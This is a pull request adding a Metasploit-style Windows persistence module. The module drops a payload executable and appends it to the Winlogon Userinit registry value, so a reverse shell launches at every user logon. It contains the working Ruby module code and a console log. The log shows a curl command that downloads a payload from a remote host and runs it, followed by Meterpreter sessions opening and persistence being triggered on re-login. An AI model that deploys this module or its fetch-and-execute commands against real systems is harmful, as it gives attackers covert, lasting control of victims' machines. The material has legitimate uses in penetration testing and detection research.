### PR TITLE
Windows Userinit persistence

### DIFF
--- a/documentation/modules/exploit/windows/persistence/registry_userinit.md
+++ b/documentation/modules/exploit/windows/persistence/registry_userinit.md
@@ -1,0 +1,109 @@
+## Vulnerable Application
+
+This module will install a payload that is executed during boot.
+It will be executed either at user logon or system startup via the registry
+value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
+The payload will be installed completely in registry.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Initial admin shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2026-01-03 16:20:11 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/registry_userinit 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry_userinit) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/registry_userinit) > set session 1
+session => 1
+msf exploit(windows/persistence/registry_userinit) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/registry_userinit) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Registry likely exploitable
+[+] Writing payload to C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe
+[*] Updating 'C:\Windows\system32\userinit.exe,' to 'C:\Windows\system32\userinit.exe,C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe'
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2052/WIN10PROLICENSE_20260103.2052.rc
+```
+
+Logout, and log back in to trigger payload execution
+
+```
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49749) at 2026-01-03 16:21:15 -0500
+
+msf exploit(windows/persistence/registry_userinit) > 
+```

--- a/documentation/modules/exploit/windows/persistence/registry_userinit.md
+++ b/documentation/modules/exploit/windows/persistence/registry_userinit.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
-This module will install a payload that is executed during boot.
-It will be executed either at user logon or system startup via the registry
-value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
-The payload will be installed completely in registry.
+This module will install a payload that is executed during user logon.
+It writes a payload executable to disk and modifies the Userinit registry value
+in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the
+payload path, causing it to execute when any user logs in.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/persistence/registry_userinit.md
+++ b/documentation/modules/exploit/windows/persistence/registry_userinit.md
@@ -8,9 +8,11 @@ payload path, causing it to execute when any user logs in.
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use [module path]`
-1. Do: `run`
-1. You should get a shell.
+2. Obtain an administrator level meterpreter on Windows
+3. Do: `use modules/exploits/windows/persistence/registry_userinit`
+4. Do: `set session #`
+5. Do: `run`
+6. On next user login, You should get a shell.
 
 ## Options
 

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Local
     new_value = (old_value.split(',') + [payload_pathname]).join(',')
     vprint_status("Updating '#{old_value}' to '#{new_value}'")
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
-    @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"
+    escaped_old_value = old_value.gsub('\\', '\\\\')
+    @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
     @clean_up_rc<<"rm #{payload_pathname.gsub('\\','/')}\n"
   end
 end

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local
     return session.sys.config.getenv(d) if d.start_with?('%')
 
     d
-    
+
   end
 
   def install_cmd(cmd, cmd_reg, root_path)
@@ -81,8 +81,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
     @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
   end
-
-
 
   def check
     return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
@@ -126,5 +124,11 @@ class MetasploitModule < Msf::Exploit::Local
     install_cmd(cmd, cmd_reg, root_path)
 
     create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
+
+    old_value = registry_getvaldata(regkey, 'Userinit')
+    new_value = "#{old_value}, #{payload_pathname}"
+    vprint_status("Updating '#{old_value}' to '#{new_value}'")
+    registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
+    @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"
   end
 end

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'joel @ ndepthsecurity'
+          'joel @ ndepthsecurity',
           'h00die',
         ],
         'Platform' => [ 'win' ],
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
     return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
 
-    return Msf::Exploit::CheckCode::Safe('Unable to read registry path #{regkey} with key Userinit') if registry_getvaldata(regkey, 'Unserinit').nil?
+    return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey,'Userinit').nil?
 
     Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
   end
@@ -82,9 +82,10 @@ class MetasploitModule < Msf::Exploit::Local
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
 
     old_value = registry_getvaldata(regkey, 'Userinit')
-    new_value = "#{old_value},#{payload_pathname}"
+    new_value = (old_value.split(',') + [payload_pathname]).join(',')
     vprint_status("Updating '#{old_value}' to '#{new_value}'")
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
     @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"
+    @clean_up_rc<<"rm #{payload_pathname.gsub('\\','/')}\n"
   end
 end

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -6,19 +6,18 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Post::Windows::Registry
   include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
   include Msf::Exploit::Local::Persistence
   prepend Msf::Exploit::Remote::AutoCheck
-  # include Msf::Exploit::Deprecated
-  # moved_from 'exploits/windows/local/registry_persistence'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Windows Registry Userinit',
+        'Name' => 'Windows Registry Persistence via Userinit',
 !        'Description' => %q{
           This module will install a payload that is executed during boot.
           It will be executed either at user logon or system startup via the registry
@@ -28,7 +27,6 @@ class MetasploitModule < Msf::Exploit::Local
         'License' => MSF_LICENSE,
         'Author' => [
           'joel @ ndepthsecurity>'
-          'Donny Maasland <donny.maasland[at]fox-it.com>', # original module
           'h00die',
         ],
         'Platform' => [ 'win' ],
@@ -38,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'References' => [
           ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
-          ['URL', 'https://huntress.io/']
+          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2015-07-01',
@@ -67,63 +65,21 @@ class MetasploitModule < Msf::Exploit::Local
 
   end
 
-  def install_cmd(cmd, cmd_reg, root_path)
-    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
-      fail_with(Failure::Unknown, 'Could not install run key')
-    end
-    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{cmd_reg}")
-  end
-
-  def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
-    @clean_up_rc << "reg deleteval -k '#{root_path}\\#{blob_reg_key}' -v '#{blob_reg_name}'\n"
-    if new_key
-      @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
-    end
-    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
-  end
-
   def check
-    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
 
-    vprint_good('Powershell detected on system')
+    return Msf::Exploit::CheckCode::Safe('Unable to read registry path #{regkey} with key Userinit') if registry_getvaldata(regkey, 'Unserinit').nil?
 
-    # test write to see if we have access
-    root_path = get_root_path
-    rand = Rex::Text.rand_text_alphanumeric(15)
-
-    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
-    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
-
-    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
-
-    Msf::Exploit::CheckCode::Vulnerable('Registry writable')
+    Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
   end
 
   def install_persistence
     payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
     payload_exe = generate_payload_exe
-    payload_pathname = folder + '\\writable_dir' + payload_name + '.exe'
+    payload_pathname = writable_dir + '\\' + payload_name + '.exe'
     vprint_good("Writing payload to #{payload_pathname}")
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
-    
-    print_status('Generating payload blob..')
-    blob = generate_payload_blob
-    print_good("Generated payload, #{blob.length} bytes")
-
-    root_path = get_root_path
-    print_status("Root path is #{root_path}")
-
-    blob_reg_key, blob_reg_name = generate_blob_reg
-    cmd = generate_cmd(root_path, blob_reg_key, blob_reg_name)
-    cmd_reg = generate_cmd_reg
-
-    print_status('Installing payload blob..')
-    new_key = install_blob(root_path, blob, blob_reg_key, blob_reg_name)
-
-    print_status('Installing run key')
-    install_cmd(cmd, cmd_reg, root_path)
-
-    create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
 
     old_value = registry_getvaldata(regkey, 'Userinit')
     new_value = "#{old_value}, #{payload_pathname}"

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),      
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
     ])
   end
 
@@ -62,14 +62,13 @@ class MetasploitModule < Msf::Exploit::Local
     return session.sys.config.getenv(d) if d.start_with?('%')
 
     d
-
   end
 
   def check
     print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
     return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
 
-    return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey,'Userinit').nil?
+    return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey, 'Userinit').nil?
 
     Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
   end
@@ -87,6 +86,6 @@ class MetasploitModule < Msf::Exploit::Local
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
     escaped_old_value = old_value.gsub('\\', '\\\\')
     @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
-    @clean_up_rc<<"rm #{payload_pathname.gsub('\\','/')}\n"
+    @clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
   end
 end

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  # include Msf::Exploit::Deprecated
+  # moved_from 'exploits/windows/local/registry_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Registry Userinit',
+!        'Description' => %q{
+          This module will install a payload that is executed during boot.
+          It will be executed either at user logon or system startup via the registry
+          value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
+          The payload will be installed completely in registry.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'joel @ ndepthsecurity>'
+          'Donny Maasland <donny.maasland[at]fox-it.com>', # original module
+          'h00die',
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['URL', 'https://huntress.io/']
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-07-01',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),      
+    ])
+  end
+
+  def regkey
+    'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+    
+  end
+
+  def install_cmd(cmd, cmd_reg, root_path)
+    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
+      fail_with(Failure::Unknown, 'Could not install run key')
+    end
+    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{cmd_reg}")
+  end
+
+  def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\#{blob_reg_key}' -v '#{blob_reg_name}'\n"
+    if new_key
+      @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
+    end
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
+  end
+
+
+
+  def check
+    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
+
+    vprint_good('Powershell detected on system')
+
+    # test write to see if we have access
+    root_path = get_root_path
+    rand = Rex::Text.rand_text_alphanumeric(15)
+
+    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
+
+    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
+
+    Msf::Exploit::CheckCode::Vulnerable('Registry writable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_exe = generate_payload_exe
+    payload_pathname = folder + '\\writable_dir' + payload_name + '.exe'
+    vprint_good("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
+    
+    print_status('Generating payload blob..')
+    blob = generate_payload_blob
+    print_good("Generated payload, #{blob.length} bytes")
+
+    root_path = get_root_path
+    print_status("Root path is #{root_path}")
+
+    blob_reg_key, blob_reg_name = generate_blob_reg
+    cmd = generate_cmd(root_path, blob_reg_key, blob_reg_name)
+    cmd_reg = generate_cmd_reg
+
+    print_status('Installing payload blob..')
+    new_key = install_blob(root_path, blob, blob_reg_key, blob_reg_name)
+
+    print_status('Installing run key')
+    install_cmd(cmd, cmd_reg, root_path)
+
+    create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
+  end
+end

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local
       update_info(
         info,
         'Name' => 'Windows Registry Persistence via Userinit',
-!        'Description' => %q{
+        'Description' => %q{
           This module will install a payload that is executed during boot.
           It will be executed either at user logon or system startup via the registry
           value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'joel @ ndepthsecurity>'
+          'joel @ ndepthsecurity'
           'h00die',
         ],
         'Platform' => [ 'win' ],
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
 
     old_value = registry_getvaldata(regkey, 'Userinit')
-    new_value = "#{old_value}, #{payload_pathname}"
+    new_value = "#{old_value},#{payload_pathname}"
     vprint_status("Updating '#{old_value}' to '#{new_value}'")
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
     @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Local
           'h00die',
         ],
         'Platform' => [ 'win' ],
-        'Arch' => [ARCH_X86, ARCH_X64]
+        'Arch' => [ARCH_X86, ARCH_X64],
         'SessionTypes' => [ 'meterpreter', 'shell' ],
         'Targets' => [
           [ 'Automatic', {} ]

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -19,10 +19,10 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Windows Registry Persistence via Userinit',
         'Description' => %q{
-          This module will install a payload that is executed during boot.
-          It will be executed either at user logon or system startup via the registry
-          value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method).
-          The payload will be installed completely in registry.
+          This module will install a payload that is executed during user logon.
+          It writes a payload executable to disk and modifies the Userinit registry value
+          in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the
+          payload path, causing it to execute when any user logs in.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Local
           'h00die',
         ],
         'Platform' => [ 'win' ],
+        'Arch' => [ARCH_X86, ARCH_X64]
         'SessionTypes' => [ 'meterpreter', 'shell' ],
         'Targets' => [
           [ 'Automatic', {} ]


### PR DESCRIPTION
fixes #20820

Introduces a new persistence module that abuses the Windows UserInit registry mechanism, ensuring a shell is executed each time a user logs in.

## Verification

List the steps needed to make sure this thing works

1. get an admin session on windows
2. `use exploit/windows/persistence/registry_userinit`
3. `set session #`
4. `exploit`
5. logoff and log back in, you should get a shell